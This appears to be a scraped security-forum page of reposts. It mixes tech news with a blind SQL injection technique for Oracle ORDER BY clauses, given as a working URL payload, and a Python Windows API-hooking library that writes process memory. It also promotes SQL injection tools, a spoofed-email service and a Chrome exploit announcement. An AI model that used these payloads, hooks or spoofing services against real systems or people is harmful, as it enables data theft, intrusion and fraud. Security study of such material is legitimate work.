Exploiting SQL Injection in ORDER BY on Oracle/MySQL submitted by alla on 10 May, 2011 - 15:10 Consider the following piece of code: $sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name"; The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection. The way to exploit such SQL injection on MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here I couldn't find any clues for Oracle though, so now that I have figured it out, here is how. This is a blind SQL injection technique - we'll have to extract one bit of info per query, using the order in which the data is returned by the application. Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id . In this case it returns the following data: foo bar baz We can try sorting by other columns and see if the data gets returned in different order. Say, if we try vulnerable.php?sortcolumn=something, we get back: bar baz foo Now all we need to do is to get the query to sort the data by different column depending on the value of a given expression. In Oracle the following syntax works: ORDER BY (case when ((boolean_expression)) then id else something end) If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this: vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end) This will extract the most significant bit of the first character of the first row returned by "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation. MySQL: http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/ http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/ Sursa: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle

Microsoft confirms purchase of Skype for $8.5 billion Tom Warren 2 hours ago Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer. “Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.” Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms. “Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said. Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009. Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.” Sursa: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors

API Hooking in Python Author: cadaver (cred) # patcher.py # handles patching and unpatching of process memory. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack, calcsize from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def OpenProcess (pid=GetCurrentProcessId()): """Opens a process by pid.""" DB ("[openProcess] pid:%s."%pid) phandle = windll.kernel32.OpenProcess (\ PROCESS_ALL_ACCESS, False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def readMemory (phandle, address, size): """readMemory (address, size, phandle):""" cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory (\ phandle, address, cbuffer, size, 0 ) assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1] return cbuffer.raw def writeMemory (phandle, address=None, data=None): """Writes data to memory and returns the address.""" assert data size = len (data) if isinstance (data, str) else sizeof (data) cdata = c_buffer (data) if isinstance (data, str) else byref (data) if not address: address = allocate (size, phandle) success = windll.kernel32.WriteProcessMemory (\ phandle, address, cdata, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] DB ("[write memory] :%s OK." % address) return address def allocate (size, phandle): """Allocates memory of size in phandle.""" address = windll.kernel32.VirtualAllocEx (\ phandle, 0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE ) assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1] DB ("[memory allocation] :%s" % address) return address def releaseMemory (address, size, phandle): """Releases memory by address.""" return windll.kernel32.VirtualFreeEx (\ phandle, address, size, MEM_RELEASE ) assert success, "Failed to read process memory!\n%s" % WinError(GetLastError()) [1] return cbuffer.raw def transport (data, phandle): size = len (data) memory = allocate (size, phandle) writeMemory (phandle, memory, data) return memory def get_patch (destination, params_size=0): """mov eax, destination call eax retn params_size """ if isinstance (destination, (int,long)): destination = pack ("i", destination) if isinstance (params_size, (int,long)): params_size = pack ("h", params_size) return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size) def get_cparams_size (cparams): if not cparams: return 0 s = '' for param in cparams: s += "size += sizeof (%s);\n" % param c_code = """ int getsize () { int size = 0; %s return size; }""" % s #DB (c_code) ccompiler = pytcc () ccompiler.compile (c_code) ccompiler.relocate () getsize = ccompiler.get_function ("getsize") size = getsize () # ccompiler.delete () return size def get_cparams_size_b (cparams): return sum (map (calcsize, [param._type_ for param in cparams])) def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000): Searches the instructions inside an API for a good place to patch.""" # DEBUG if DEBUG == 2: bytes = PyGetString (apiaddress, needed_size * 2) dprint (apiaddress, bytes) # # # # aoffset = 0 found_space = 0 position = apiaddress while found_space < needed_size: bytes = PyGetString (position, 24) # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex(position))) # if does_code_end_function (bytes): raise "Function end found before enough space was found!" offset, size, instruction, hexstr = Decode (position, bytes) [0] if "ret" in instruction.lower (): raise "Function end found before enough space was found!" if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): found_space += size else: found_space = 0 aoffset += size if aoffset >= maxscan: raise "Maxscan exceeded while searching for a good spot to patch!" position += size return apiaddress + (aoffset - found_space) class patcher: source = None destination = None jmp_asm = None original_bytes = None params_size = 0 pid = None phandle = None duplicate_api = None original_api = None def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId () ): self.set_pid (pid) self.set_source (source) self.set_destination (destination) self.set_params_size (params_size) def set_pid (self, pid): self.close () self.phandle = OpenProcess (pid) self.pid = pid def set_source (self, source): self.source = source def set_destination (self, destination): self.destination = destination def set_params_size (self, size): self.params_size = size def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True): module = LoadLibrary (dllname) procedure = GetProcAddress (module, apiname) if free: FreeLibrary (module) assert procedure self.original_api = eval ("windll.%s.%s" % (dllname.strip(".dll"), apiname)) self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size))) if DEBUG: DB ("found good spot to patch: %s %s. Offset from original api address: %s." \ %(self.source, hex (self.source), self.source - procedure)) def patch (self): assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!" assert not self.original_bytes, "Already patched!" self.jmp_asm = get_patch (self.destination, self.params_size) jmp_asm_size = len (self.jmp_asm) self.original_bytes = PyGetString (self.source, jmp_asm_size) assert self.original_bytes, "Failed to capture original_bytes." writeMemory (\ phandle=self.phandle, address=self.source, data=self.jmp_asm) msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \ % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes)) DB (msg) def unpatch (self): if not self.original_bytes: raise "Not patched!" assert all ((self.phandle, self.source, self.destination)), "Not initialized!" writeMemory (\ phandle=self.phandle, address=self.source, data=self.original_bytes ) self.original_bytes = None def close (self): if self.phandle: windll.kernel32.CloseHandle (self.phandle) self.phandle = None def release (self): if self.phandle and self.duplicate_api: releaseMemory (self.duplicate_api, 0, self.phandle) def call_original_api (self, *args, **kwargs): return self.original_api (*args, **kwargs) def call_duplicate_api (self, types, *args, **kwargs): return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs) def __del__ (self): try:self.unpatch () except:pass try:self.release () except:pass try:self.close () except:pass def dprint (a, c): """Pretty prints disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size print #cad # tramper.py # Relocates bytes of an API and creates a jump from those bytes to the original API affectively negating a hook. # TODO !Recalculate Relocated Relative jmp and call addresses. # public domain code. from ctypes import * from win32api import * from pytcc import pytcc from struct import pack, unpack from win32gui import PyGetString, PySetMemory, PySetString from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS from distorm import Decode from patcher import OpenProcess, readMemory, writeMemory, allocate, transport DEBUG = True def DB (msg): global DEBUG if DEBUG: print (msg) def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"): Creates a duplicate API using the trampoline method and returns its address. """ if DEBUG: global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes if not apiaddress: dll = LoadLibrary (dllname) apiaddress = GetProcAddress (dll, apiname) landing_offset = 0 hprocess = OpenProcess () original_bytes = PyGetString (apiaddress, 300) tramp_memory = allocate (len (original_bytes) + 50, hprocess) print "Tramp memory: %s %s." % (tramp_memory, hex (tramp_memory)) instructions = Decode (apiaddress, original_bytes) sizes = iter ([X[1] for X in instructions]) while landing_offset < hook_size: landing_offset += sizes.next () landing_address = apiaddress + landing_offset DB ("Landing offset : %s %s" % (landing_offset, hex (landing_offset))) DB ("Landing address: %s %s" % (landing_address, hex (landing_address))) distance = landing_address - (tramp_memory +landing_offset) DB ("Distance: %s %s." % (distance, hex (distance))) tramp_code = original_bytes [:landing_offset] # api start - past hook - to start of instruction instructions = Decode (apiaddress, tramp_code) boffset = 0 for offset, size, instruction, hexstr in instructions: if filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]): raise "[not supported yet] Cannot relocate CALL/JMP Instructions. Address: %s"% (apiaddress + boffset) boffset += size # # TODO !Recalculate Relocated Relative jmp and call addresses. # jump_code = '\xe9' + pack ("i", distance - 5) # bytes = jmp (distance - size of jump) tramp_code += jump_code # DEBUG DB ("Tramp [size]: %s [bytes]; %s" % (len(tramp_code), (repr(tramp_code)))) DB ("Tramper api decode.") if DEBUG: dprint (apiaddress, tramp_code) # # # # writeMemory (hprocess, tramp_memory, tramp_code) CloseHandle (hprocess) return tramp_memory def dprint (a, c): """ pretty print disassembled bytes. dprint (offset, bytes).""" x = Decode (a, c) print "[deci addr : hexi addr] [size] instruction\n" for offset, size, instruction, hexstr in x: print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction) a += size if __name__ == "__main__": # Test. lib = LoadLibrary ("kernel32") OpenProcessAddr = GetProcAddress (lib, "OpenProcess") FreeLibrary (lib) trampAddr = tramper (\ apiaddress=OpenProcessAddr, # (optional if apiname is defined) API address to duplicate. hook_size=10, # size of our API jmp code. (minimum size of relocated API bytes) apiname=None, # (optional) dllname="kernel32") # (optional / defaults to kernel32) # Prototype the OpenProcess trampoline. duplicate_OpenProcess = WINFUNCTYPE (c_int, c_int, c_int, c_int) (trampAddr) pid = GetCurrentProcessId () print "Calling duplicate OpenProcess with pid: %s" % pid phandle = duplicate_OpenProcess (0x1f0fff, 0, pid) print "Return value: %s." %phandle if phandle: CloseHandle (phandle) #cad # hooker.py # deals with hooking of win32 APIs. # public domain code. from patcher import * from tramper import tramper from win32api import * from pytcc import pytcc def create_hook (duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ create_hook (pat, duplicate_api, cparam_types='', prelogic="", postlogic="", restype="int"): """ c_code =\ """ %s function (int caller, %s) { %s %s RET = DUPE ( %s ); %s return RET; }""" cargs = '' symbols = '' for arg, char in zip (cparam_types, "ABCDEFGHIJKLMNOPQRSTUVWXYZ"): symbols += "%s, " % char cargs += "%s %s, " % (arg, char) symbols = symbols [:-2] cargs = cargs [:-2] c_code = c_code % (restype, cargs, prelogic, restype, symbols, postlogic) ccompiler = pytcc () ccompiler.add_lib_proc ("msvcrt.dll", "memset") ccompiler.add_symbol ("DUPE", duplicate_api) ccompiler.compile (c_code) ccompiler.relocate () hook = ccompiler.get_symbol ("function") return (c_code, hook) def hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """hooker (apiname, cparam_types=list(), restype="int", prelogic='', postlogic='', pid=GetCurrentProcessId(), dllname="kernel32"): """ pat = patcher () params_size = get_cparams_size (cparam_types) pat.set_params_size (params_size) pat.set_source_as_api (apiname, dllname) hook_size = len (get_patch (pat.destination, pat.params_size)) tramp = tramper (pat.source, hook_size) pat.duplicate_api = tramp hook_ccode, hooks = create_hook (tramp, cparam_types, prelogic, postlogic, restype) pat.c_code = hook_ccode pat.set_destination (hooks) return pat if __name__ == '__main__': # Test. hook = hooker (\ # API to hook apiname="OpenProcess", # the DLL the API is in. (defaults to kernel32) dllname="kernel32", # (required) API parameter types. In our hook these get translated to the names A,B,C...respectively. cparam_types=["int", "int", "int"], # (required) the API return type. restype="int", # (optional) this is the code in our hook wich is executed Before the real API. prelogic="if (C==1) {return 1111;}", # (optional) this is the code in our hook wich is executed After the real API. The real API's return value is named RET. postlogic="if (RET) {return 0;}" ) # hook API. # hook automatically unhooks itself and cleans up when it isnt refered to anymore. hook.patch () print "Calling hooked OpenProcess api with process id as 1." ret = windll.kernel32.OpenProcess (0x1f0fff, 0, 1) print "Return value: %s" % ret if ret == 1111: print "This test was sucesful." else: print "Return value is unexpected." # unhook API. # hook.unpatch () #cad Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3110 Sursa: API Hooking in Python - rohitab.com - Forums

Nu, continea SQLite, deci 99% era un Stealer, care printre altele era si pentru Firefox. Nu m-am chinuit sa analizez fisierul, am vazut aia, am dat ban.

Address Space Randomization for Mobile Devices Hristo Bojinov Stanford University Dan Boneh Stanford University Rich Cannings Google, Inc. Iliyan Malchev Google, Inc. ABSTRACT Address Space Layout Randomization (ASLR) is a defen- sive technique supported by many desktop and server oper- ating systems. While smartphone vendors wish to make it available on their platforms, there are technical challenges in implementing ASLR on these devices. Pre-linking, lim- ited processing power and restrictive update processes make it difficult to use existing ASLR implementation strategies even on the latest generation of smartphones. In this paper we introduce retouching, a mechanism for executable ASLR that requires no kernel modications and is suitable for mo- bile devices. We have implemented ASLR for the Android operating system and evaluated its eectiveness and per- formance. In addition, we introduce crash stack analysis, a technique that uses crash reports locally on the device, or in aggregate in the cloud to reliably detect attempts to brute-force ASLR protection. We expect that retouching and crash stack analysis will become standard techniques in mobile ASLR implementations. Download: http://bojinov.org/professional/wisec2011-mobileaslr-paper.pdf

UNIX Tutorial for Beginners These tutorials are derived from the excellent tutorials from the University of Surrey, UK, with some minor modifications for our site. The originals can be found here. Typographical Conventions Introduction to The UNIX operating system Tutorial One Listing files and directories Making Directories Changing to a different Directory The directories . and .. Pathnames More about home directories and pathnames Tutorial Two Copying Files Moving Files Removing Files and directories Displaying the contents of a file on the screen Searching the contents of a file Tutorial Three Redirection Redirecting the Output Redirecting the Input Pipes Tutorial Four Wildcards Filename Conventions Getting Help Tutorial Five File system security (access rights) Changing access rights Processes and Jobs Listing suspended and background processes Killing a process Tutorial Six Other Useful UNIX commands Tutorial Seven Compiling UNIX software packages Download source code Extracting source code Configuring and creating the Makefile Building the package Running the software Stripping unnecessary code Tutorial Eight UNIX variables Environment variables Shell variables Using and setting variables UNIX Frequently Asked Questions (FAQs) These seven articles contain the answers to some Frequently Asked Questions often seen in comp.unix.questions and comp.unix.shell. History of UNIX UNIX was originally developed at Bell Laboratories as a private research project by a small group of people. Read all about the history of its creation. This tutorial is licensed under a Creative Commons License. The original version was prepared and is copyrighted by Michael Stonebank of the University of Surrey, UK. Online: http://manuals.itc.virginia.edu/unixtut/index.html

SQID SQL Injection Digger About SQL injection digger is a command line program that looks for SQL injections and common errors in web sites. Current version can perform the following operations: Look for SQL injections and common errors in web site URLs found by performing a google search. Look for SQL injections and common errors in a given URL or a file with URLs. Look for SQL injections and common errors in links from a web page. Crawl a web site/web page and do the above. Also supports Load multiple triggers from file. Load multiple signature databases from files. HTTPS support. HTTP proxy support with authentication. Basic authentication. Specify user agent. Specify referer. HTTP Cookies loading from command line or a file. sqid is written in ruby.Find out more about SQL Injection. sqid is extensible by adding more signatures to its database (sqid.db). The signatures simply use regular expressions. Usage Usage: sqid.rb [options] options: -m, --mode MODE Operate in mode MODE. MODE is one of g,google Operate in google search mode. u,url Check this url or a file with urls. p,page Check single page. c,crawl Crawl website and check. Google search mode options: -q, --query QUERY QUERY to perforn google search for. -s, --start START zero-based index of the first desired result, zero if not specified. -r, --results RESULTS number of results desired, default is 20 if not specfied. rounded to tens. URL check mode options: -u, --url URL check this URL. If URL is a file urls will be loaded from this file, specify each url on a new line. Page check mode options: -p, --page PAGE Check this page. Crawl mode options: -c, --crawl WEBSITE Crawl website WEBSITE and check. specfify as http[s]://WESITE:[PORT], default PORT is 80 URL, Page and Crawl mode common options: -C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value. If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line. -a, --accept-cookies Accept cookies from the webite or page. Default is no. -R, --referer REFERER Set referer in the HTTP header. -B, --auth CREDENTIALS Use crendtials as basic auth for the website. specfify as user:password. Common options: -o, --with-noquery Match page content without query parameters. Default is false. -D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database. -t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '. If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline. Lines starting with a # are ignored. -T, --time-out TIMEOUT Timeout for response in seconds. Default is 10 seconds. -U, --user-agent USERAGENT User Agent in the HTTP Header. -P, --proxy PROXY User HTTP proxy PROXY for operations. specfify as proxy:port. -A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy. specfify as user:password. -v, --verbose Run verbosely. -h, --help Show this message Download: http://rubyforge.org/frs/?group_id=2617

SQL Power injector Introduction SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page. For now it is SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant, but it is possible to use it with any existing DBMS when using the inline injection (Normal mode). Indeed, the normal mode is basically the SQL command that someone will put in the parameter sent to the server. If the aspect of inline SQL injection is powerful in itself, its main strength dwells in the multithreaded automation of the injection. Not only there is a possibility to automate tedious and time consuming queries but you can also modify the query to get only what you want. It is obviously more useful in the blind SQL injection since the other ways to exploit the SQL injection vulnerability is more effusive and much faster when the results are displayed on the web page (union select in a HTML table and generated 500 error for instance). The automation can be realized in two ways: comparing the expected result or by time delay. The first way is generally compared against an error or difference between positive condition with a negative one and the second way will turn out positive if the time delay sent to the server equals to the one parameterized in the application. The main effort done on this application was to make it as painless as possible to find and exploit a SQL injection vulnerability without using any browser. That is why you will notice that there is an integrated browser that will display the results of the injection parameterized in a way that any related standards SQL error will be displayed without the rest of the page. Of course, like many other features of this application, there are ways to parameterize the response of the server to make it as talkative to you as possible. Another important part of this application is its power to get all the parameters from the web page you need to test the SQL injection, either by GET or POST method. Like this someone won't need to use several applications or a proxy to intercept the data, all is automated! Not only that, but now there is a Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies). I worked hard on the application usability but I am aware that at first use it's not too obvious. I'm pretty confident that once the few things you need to comprehend are understood it will be quite easy to use afterwards. In order to help a beginner to understand its basic features I created a tutorial that not only will help him out but can also be educative for some advanced SQL injection techniques. Moreover, You will find some great tricks in the FAQ as well and now with the version 1.2 a help file (chm) containing a list of the most useful information for SQL injection. Also, I designed this application the way I was making my own pen testing and how I was using SQL injection. It has been tested successfully many times on real life web sites (legally of course) and as soon as I see something missing I'm adding it. Now of course that it's officially available to the security community I will have to have more rigors and wait to add them in a new version of the software. This process has already started and many more features will come with time. Finally, this application will be free of charge and hopefully be used to help in security assessments made by security professionals or to further the knowledge of the techniques used. Obviously I will not be held responsible of any misuses or damage caused by this application. What It's Not This application if powerful won't find SQL injection vulnerabilities for you nor will find the right syntax if one found. Its main strength is to provide a way to find them more easily and once they are found to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique. Moreover, I didn't intent to make it to be a database pumping application. There are plenty good applications for that purpose. In any cases many pumped data are not relevant and since it takes time to pump it can be a real waste of time. It's better to refine and get what you really want. Lastly, if I added the feature (mini-browser) to have the results in an HTML format it doesn't mean that it has all the features of a professional browser. Internet Explorer and Mozilla, to mention a few, are real complex software that it would be nearly impossible to implement all their features in my application. That's why that you won't be able to use it as a conventional browser even though it has the same look and feel. Features Supported on Windows, Unix and Linux operating systems SQL Server, Oracle, MySQL, Sybase/Adaptive Server and DB2 compliant SSL support Load automatically the parameters from a form or a IFrame on a web page (GET or POST) Detect and browse the framesets Option that auto detects the language of the web site Detect and add cookies used during the Load Page process (Set-Cookie detection) Find automatically the submit page(s) with its method (GET or POST) displayed in a different color Can create/modify/delete loaded string and cookies parameters directly in the Datagrids Single SQL injection Blind SQL injection Comparison of true and false response of the page or results in the cookie Time delay Response of the SQL injection in a customized browser Can view the HTML code source of the returned page in HTML contextual colors and search in it Fine tuning parameters and cookies injection Can parameterize the size of the length and count of the expected result to optimize the time taken by the application to execute the SQL injection Create/edit ASCII characters preset in order to optimize the blind SQL injection number of requests/speed Multithreading (configurable up to 50) Option to replace space by empty comments /**/ against IDS or filter detection Automatically encode special characters before sending them Automatically detect predefined SQL errors in the response page Automatically detect a predefined word or sentence in the response page Real time result Save and load sessions in a XML file Feature that automatically finds the differences between the response page of a positive answer with a negative one Can create a range list that will replace the variable (<<@>>) inside a blind SQL injection string and automatically play them for you Automatic replaying a variable range with a predefined list from a text file Firefox plugin that will launch SQL Power Injector with all the information of the current webpage with its session context (parameters and cookies) Two integrated tools: Hex and Char encoder and MS SQL @options interpreter Can edit the Referer Can choose a User-Agent (or even create one in the User-Agent XML file) Can configure the application with the settings window Support configurable proxies Differences with Other Tools To be honest, I didn't study all the other tools features in all their details. The only thing I can say is that if they are great they always lack something important that I need when I'm doing SQL injection. Some application will find the SQL injection for you that sometimes will result in false positive. And others will generically pump the data of the database. Some of those applications got smarter and you can check for what you need when the list of databases has been pumped. Or ask a specific hard coded data, such as the current DB user. But none of them have the ability to specifically choose what you want as far as I know. That ability comes with a cost of course, you need to know some SQL syntax, but I can assure that once someone understands how it works, not much syntax is required. Also, I cannot recall to have seen any application using the time delay feature inserted in the application. Many SQL injection vulnerabilities are impossible to exploit unless you use that technique. A technique that could be really tedious and time consuming, that often results by giving up after long hours of copy pasting the command in the browser when done manually. I don't remember as well to have seen any multithread feature that can be most definitely a really important time saver. Nor the ASCII characters preset feature that can save up to 25% the blind SQL injection. (Please look at the statistics section for some figures) I apologize in advance to those who have made their own application and made it available on the Net that possess those features before I made SQL Power Injector available. Please let me know and I will update this section. Summary of the differences: Web page string and cookie parameters auto detection Fine tuning parameters SQL injection Time delay feature Multithread feature Response results in a customized browser Automated positive and negative condition discovery Blind SQL injection characters preset optimizer Screenshots You will find two screen shots demonstrating the two techniques used in the application: Normal and Blind. Screen 1: SQL Power injector with Normal technique Screen 2: SQL Power injector with Blind technique Some Statistic Figures I didn't use any scientific methods so do not consider those statistics as scientific facts but more as a general idea of what you can expect. Especially that no one controls the flux on the Net and I would be really hard pressed to give any valuable scientific data. Another thing, I didn't make enough tests (10 times for each thread) to have a real statistical sample since the goal of these numbers will be to show approximately what you can expect. Moreover, it will depend also of the size of the data sought. Sometimes a lower number of threads will be more effective than more. In fact, the time taken will be optimized if the length of the value is a divisible number of the number of thread. So let's say we have 24 characters length, 3, 4, 6 and 8 will be faster than any other. As a rule of thumb, the bigger gap of time between any thread is from 1 to 2. As you can see the higher is not always the better. You will see some examples in the following statistics. Even though you can go up to 50 threads, I have discovered that around 10 threads it's starting to have errors and getting slower and slower. So again bigger number of threads is not necessary better. I must warn as well that the higher number of threads is, the higher is the chances to crash the web application (web server or database) I must thank Nathaniel Felsen to have allowed me to test on one of his web server and my wife Elizabeth to have done all the tedious tests for me in her free time. Here are the characteristics of the computer used to make the tests: AMD Athlon ? 64 X2 Dual Core Processor 4200+ GHz 2 GB of RAM Windows XP SP 2 ADSL 1 MB/s Ping round trip average time of 173 ms Download: http://www.sqlpowerinjector.com/download.htm

Nu, cam Google incepuse monopolizarea, Microsoft a cam ramas in urma...

Cui ii pasa de unde au ideea, problema noastra e sa gasim metode sa scoatem bani multi, usor si desigur legal din asta

SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering SWFRETools package contains three different tools. The most advanced tool is called Flash Dissector. It is a Java-based GUI tool you can use to inspect the binary content of SWF files. The second tool is a Java-based command-line tool called Minimizer. This tool is useful for vulnerability researchers that have a SWF file that crashes Flash Player and now they want to get rid of all parts of the SWF file that are not related to the crash. The third tool is a primitive Python-based debugger that can be used to hook and trace the Flash Player executable. Download: https://github.com/sporst/SWFREtools/downloads Sursa: SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering ! ~ THN : The Hackers News

Online Fake Mailer As IT managed services are now focuing on clouds, So is the information security. Spam mails are the biggest threat to every individual and it is not going to end any sooner. But now a days spam filter do their job quit efficiently making spammers life a bit worried. so here is a online we mean a “cloud service” which can test both spammers and spam filters skills. Small list if features Email Doesn’t go in spam folder Instant delivery of emails With Attachment Support With HTML Editor And Many Other Features http://emkei.cz/

Google Chrome Pwned by VUPEN aka Sandbox/ASLR/DEP Bypass Hi everyone, We are (un)happy to announce that we have officially Pwned Google Chrome and its sandbox. The exploit shown in this video is one of the most sophisticated codes we have seen and created so far as it bypasses all security features including ASLR/DEP/Sandbox, it is silent (no crash after executing the payload), it relies on undisclosed (0day) vulnerabilities discovered by VUPEN and it works on all Windows systems (32-bit and x64). The video shows the exploit in action with Google Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64). The user is tricked into visiting a specially crafted web page hosting the exploit which will execute various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level. Note: The Calculator is used here as an example, it can be replaced by any other payload. While Chrome has one of the most secure sandboxes and has always survived the Pwn2Own contest during the last three years, we have now uncovered a reliable way to execute arbitrary code on any installation of Chrome despite its sandbox, ASLR and DEP. This code and the technical details of the underlying vulnerabilities will not be publicly disclosed. They are shared exclusively with our Government customers as part of our vulnerability research services. Sursa si video demonstrativ: http://www.vupen.com/demos/

Skype în negocieri pentru un parteneriat cu Microsoft ? 09 mai 2011 | 11:29 Aurelian Mihai Skype, renumitul furnizor pentru servicii de telefonie prin internet a devenit subiect de bârf? în urma informa?iilor ap?rute în ultima s?pt?mân?, ce anun?? negocieri intense purtate între oficialii companiei ?i reprezentan?i ai Facebook ?i Google, aparent pentru stabilirea unui parteneriat sau chiar achizi?ia acesteia. Mai nou, chiar ?i Microsoft pare s? intre în jocul negocierilor, iar motiva?ii pentru un eventual parteneriat sau achizi?ia portofoliului Skype sunt destule: Achizi?ia sau parteneriatul cu Skype poate aduce compania într-o pozi?ie favorabil? pe pia?a de comunica?ii enterprise, unde Skype are deja o prezen?? solid? pe partea serviciilor de voce, video ?i sharing. Prin achizi?ia Skype, Microsoft ar ob?ine dreptul de a integra serviciile companiei cu versiunile viitoare ale platformei Windows Mobile, impulsionând astfel adoptarea acesteia de c?tre un public mai larg. Împreun? cu Skype, Microsoft ar avea posibilitatea de a colabora cu marii operatori ai re?elelor de telefonie mobil?, mul?i dintre ei interesa?i deja de un parteneriat cu Skype Informa?iile venite din surse apropiate de Skype promit un anun? oficial în decursul acestei s?pt?mâni. În timp ce o achizi?ie integral? este pu?in probabil?, este posibil s? asist?m la crearea unui parteneriat între Microsoft ?i Skype, similar celui stabilit deja cu Nokia, din care ambele companii s? aib? de câ?tigat. Sursa: Skype în negocieri pentru un parteneriat cu Microsoft ?

Facebook te pl?te?te s? urm?re?ti reclame! 09 mai 2011 | 10:21 Aurelian Mihai Facebook a introdus un nou program de promovare, prin care utilizatorii sunt motiva?i financiar s? priveasc? anumite reclame. Vizionarea reclamelor distribuite prin re?eaua Facebook este recompensat? folosind sistemul de credite, fiecare reclam? fiind recompensat? cu 1 credit sau echivalentul a 10 cen?i. Chiar daca nu se poate vorbi despre o recompens? substan?ial?, promisiunea unui câ?tig ar putea fi suficient? pentru acei utilizatori care petrec oricum foarte mult timp conecta?i la re?eaua Facebook ?i doresc sa valorifice cumva acel timp. Mesajele publicitare pl?tite vor ap?rea mai ales în jocuri, cum ar fi Crowd Star, Digital Chocolate ?i Zynga. Facebook colaboreaz? cu Sharethrough, SocialVibe, Epic Media ?i SupersonicAds pentru furnizarea de reclame în cadrul programului, precum ?i TrialPay, un sistem de sondaje ai c?rui participan?i sunt recompensa?i financiar. Dan Greenberg, CEO pentru Sharethrough, a afirmat c? ini?iativa luat? de Facebook reprezint? o departajare de la sistemul tradi?ional de reclame întreruptive, oferind mesaje publicitare cu caracter de divertisment, pe care utilizatorii vor dori s? le priveasc? ?i s? le trimit? mai departe prietenilor. De?i câ?tigurile realizate nu pot fi transferate pe card-ul de credit, sistemul de credite Facebook ne ofer? posibilitatea de a cheltui ace?ti bani pentru a cump?ra diverse bunuri promovate în cadrul reclamelor pe care le vizion?m, sau alte 